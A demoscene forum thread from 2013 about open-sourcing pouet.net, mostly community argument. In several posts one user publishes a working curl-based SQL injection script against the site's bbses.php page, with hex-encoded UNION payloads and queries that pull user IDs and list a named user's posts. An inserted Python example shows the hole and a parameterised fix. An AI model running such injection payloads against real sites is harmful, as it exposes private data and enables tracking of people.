pouët.net

Open sourcing pouet.net ?

category: offtopic [glöplog]
So all we ended up with this open source bull-shit thread was that we are to deploy crap "renderTop10Prods()" code but no proper api?

And instead of a proper api per general we ask lawyers if we can publish the database?

LOL.

Ok might as well scrap me from the site as well. Together with all the products I've added since they are not facts, they are all pouet statements and most of them never existed.

BBL with new accounts.
added on the 2013-05-12 10:50:59 by Hatikvah Hatikvah
Why don't you empty all that emotion into a well crafted pull request and patch, Haktivah?
added on the 2013-05-12 11:11:03 by rc55 rc55
Quote:
Hatikvah:
So all we ended up with this open source bull-shit thread was that we are to deploy crap "renderTop10Prods()" code but no proper api?

And instead of a proper api per general we ask lawyers if we can publish the database?

Hey, things take time. The people contributing to Pouet (on the source or otherwise) can't do everything at once, and are otherwise busy with their jobs, etc. Most of this thread was done during the last week. So assuming a full work week, that leaves only evenings to do something.

It's also not like anyone has backtracked on putting in a "proper API", things just have to get there. Unless you're going to start contributing to the code yourself, I think you should have a little patience and some faith! :)

We don't need to start a whole other argument over in here. We've already had 38ish pages of that.

I think this needs repeating:
[image]
Perhaps we should go make a demo about this...
added on the 2013-05-12 11:58:12 by trc_wm trc_wm
Hi
can you explain if you can, in layman's terms, just what is missing or is wrong with the current version of pouet? It is fast and is up all the time, and its main features (bbd, demo db and oneliner) are working fine. I honestly don't know ?!!
added on the 2013-05-12 12:52:23 by Navis Navis
@ Navis
Well, non-technically, no, there isn't anything "wrong". It works.

However, as noted after the first short period of being open source on GitHub, there were at least a few SQL injection security holes, that even if it weren't open could have eventually been found and used.

The code itself is also complicated and doesn't take into account newer technologies that would make it easier to avoid such mistakes. The complicated nature of it also makes it hard to add new features without increasing the maintenance complexity or chance of breaking other existing features. There are plenty of new features or improvements to existing features that could be integrated if it were easier to do.
If you want an explicit list of things "missing", you can check the roadmap in the main readme or the issues listed at the project's github project repository.
Quote:
by AMcBain:
there were at least a few SQL injection security holes

holes found and fixed*
I guess ideally the new commits should not go to 'live pouet' immediately and should be reviewed to make sure that new exploits are not being introduced?
added on the 2013-05-12 14:48:16 by Dbug Dbug
Normally if you use the pull model and topic branches, merging / committing to master *is* the result of a review.
added on the 2013-05-12 14:56:52 by _-_-__ _-_-__
Dbug: the readme at https://github.com/kebby/pouet.net/tree/master/contribs explains the process. Changes aka pull requests are first tried out on a staging version of the site, and when they're approved they go to the master branch which will auto-deploy on the live site.
added on the 2013-05-12 15:02:54 by kb_ kb_
Now we've got everything pretty much sorted, we can get cracking on the next problem: deleting iq's account. :P
added on the 2013-05-12 16:52:13 by psonice psonice
lator: API is planned, no worries, it's gonna happen !

/!\ DONT PANIC /!\
added on the 2013-05-12 21:17:20 by analogue analogue
damn, this thread is growing super fast!

I'm kinda lost here, can someone please try to summarize the last 42 pages in few paragraphs?
added on the 2013-05-12 21:46:45 by TLM TLM
Everything is well again. Sort of.
TLM: Analogue wanted to open up the Pouet codebase, but people were concerned that this would interfere with Gargaj's work on Pouet v2. So then PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES PONIES and both versions were open-sourced, and Gargaj is still an admin and is still going to work on Pouet v2, and a bunch of other people have submitted security patches and new features, and people are working on getting as much data as possible available while staying on the right side of privacy/copyright, and everyone learned an important lesson about friendship.
added on the 2013-05-12 22:11:41 by gasman gasman
so friendship IS magic!
added on the 2013-05-12 22:16:17 by ted ted
I do not understand what is issue with pouet open sores and pouet API ??? Pouet has had API for years !! I recently discuss with Gargaj and he say this not dangerous feature!! I implement following high-tech bash script for direct pouet.NET DB interface:
Code:
#!/bin/bash
function urlencode {
  echo -ne "$@" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g'
}
POUET="http://pouet.net/bbses.php"
MAGIC="0%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%201"
QUERY="which=${MAGIC},("`urlencode $1`"),0xba,0xdc,0xed,0xbe,0xef,0xba,0xbe%23"
curl -s "${POUET}?${QUERY}" | grep "which=1" | cut -c 37- | awk -F '</a>' '{print $1}'


is use is simple. normal SQL interface, lets find prod with most votes:
Code:
$ ./pouet.sh "SELECT name FROM prods ORDER BY voteup DESC LIMIT 1"
fr-041: debris.


see, easy for average SQL/Webmonkey!! One restriction here.. we can only is limit to ONE column and row per result. but clever monkey can is make use of GROUP_CONCAT and friends hehhheh.

I call this Pouet BOP interface! (BBS Oriented Programming) Have fun!!
added on the 2013-05-12 22:20:39 by blasty blasty
there's an error in your code man, it should be MAGIC="FRIENDSHIP"
added on the 2013-05-12 22:30:57 by nic0 nic0
Oh, is one more problem. if user want use string literals, cannot use normal notation 'like this' or 'LIKE THAT'. Will have to use hex encoded string literal to is make bypass of quote characttre.

For example we want find group ID of most famous BITS (HERMAN SAMSO) group. We is convert "BITS" to hex -> 42 49 54 53 and make craft SQL query:

Code:
$ ./pouet.sh "SELECT id FROM groups WHERE name = 0x42495453"
5718


Bingo! Group ID 5718 is BITS!
added on the 2013-05-12 22:31:43 by blasty blasty
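Why a quote-escaping filter does not protect a numeric parameter such as `which`, and what does, as an added example that is not part of the original posts and is not pouet.net code. It uses Python with an in-memory SQLite database; the schema, rows, function names and the crafted input are all constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed toy schema and rows; not pouet.net's real tables or data.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE bbs_topics (id INTEGER PRIMARY KEY, topic TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, nickname TEXT);
        INSERT INTO bbs_topics VALUES (1, 'Open sourcing'), (2, 'Random');
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
    """)
    return db

def escape_quotes(value):
    # Stand-in for a quote-escaping input filter: it only rewrites quote characters.
    return value.replace("'", "''")

def topic_vulnerable(db, which):
    # The value lands in a numeric context (no surrounding quotes), so a
    # quote-free input passes the filter unchanged and becomes part of the SQL.
    sql = "SELECT topic FROM bbs_topics WHERE id = " + escape_quotes(which)
    return [row[0] for row in db.execute(sql)]

def topic_hardened(db, which):
    # 1) Reject anything that is not a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", which):
        raise ValueError("which must be a numeric id")
    # 2) Bind the value; the driver never parses it as SQL text.
    sql = "SELECT topic FROM bbs_topics WHERE id = ?"
    return [row[0] for row in db.execute(sql, (int(which),))]

if __name__ == "__main__":
    db = make_db()
    crafted = "0 UNION ALL SELECT nickname FROM users"  # constructed input, no quotes
    print(topic_vulnerable(db, "1"))
    print(topic_vulnerable(db, crafted))   # rows from another table leak
    try:
        topic_hardened(db, crafted)
    except ValueError as err:
        print("rejected:", err)
```
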
Another practic exampl. Say if you dont like person called MAGIC and want to know where he hang on Pouet BBS. So you can avoid direct contact with this guy..

We find ID for MAGIC guy:
Code:
$ ~/pouet.sh "SELECT id FROM users WHERE nickname = 0x4d61676963"
4627


Now.. we find all post for evil magic guy:

Code:
for i in `seq 0 100`; do ~/pouet.sh "SELECT DISTINCT topic FROM bbs_posts WHERE author = 4627 LIMIT $i,1" ; done
1293
1710
1603
640
1754
1806
1812
1830
1799
1842
..


get creative!!!
added on the 2013-05-12 22:38:02 by blasty blasty
Quote:
so friendship IS magic!

<3 <3 <3 (:
added on the 2013-05-12 22:48:37 by gaspode gaspode
Gloom: I'm really concerned about what you did here. Page after page, you did nothing but fuel the fire.

In my opinion, the opposite of "let's pretend nothing happened and move on" isn't what you did.

Gloom, these are your words (emphasis mine):

Quote:
As a community, I can't accept that we just stand back and watch while these events unfold.

Quote:
Analogue is getting resistance because he's in the wrong, and doubly so because of the way he responds to the resistance. The fact that he's unable to grasp just how badly he has behaved and mismanaged the situation just makes it worse.


Gloom, you don't accept the situation: I get it. You raise your voice: perfectly fine by me. But please acknowledge my humble (hopeless?) resistance against your violent behavior. I feel outraged by the way you handled it: you mismanaged it, really. Post after post, you just spread more and more hate.

Gloom, since we're not sharing projects together I believe we'll never have to disagree on something else than comments on Pouet. And in fact I feel relieved because you apparently use everything it takes to crush your opponents (from your own fame to networking). Again, that doesn't mean I'm with Analogue (we don't even know each other bla bla bla etc.)

All in all Gloom, we didn't need your campaign against Analogue. We needed Analogue to have the guts to apologize. We needed Gargaj to get through the difficult pride/trust situation. Hopefully, that's how it ended.

Gloom, I wish we could have all read you after Analogue apologized.
Gargaj, you impressed me.
Q439#2!:
Quote:

All in all Gloom, we didn't need your campaign against Analogue.

Not sure about that. I think he made a difference. I think you're just reacting to his style. When Gloom is right, he is usually loud about it. And Gloom is seldom wrong.

And if things like style could rub you the wrong way, you should steer clear of pouet. It's a dreadful place. In fact, if there was no pouet tomorrow, I would shed no tears. But if I did, it would be on behalf of the poor sod that kept the site alive and functional before it was shot down by a nostalgic jerk.
added on the 2013-05-13 00:36:53 by Hyde Hyde
Quote:
by ٩๏&#:
We needed Analogue to have the guts to apologize. [...] Hopefully, that's how it ended.

Yes, yes it did. Please read back a page two pages, thanks.
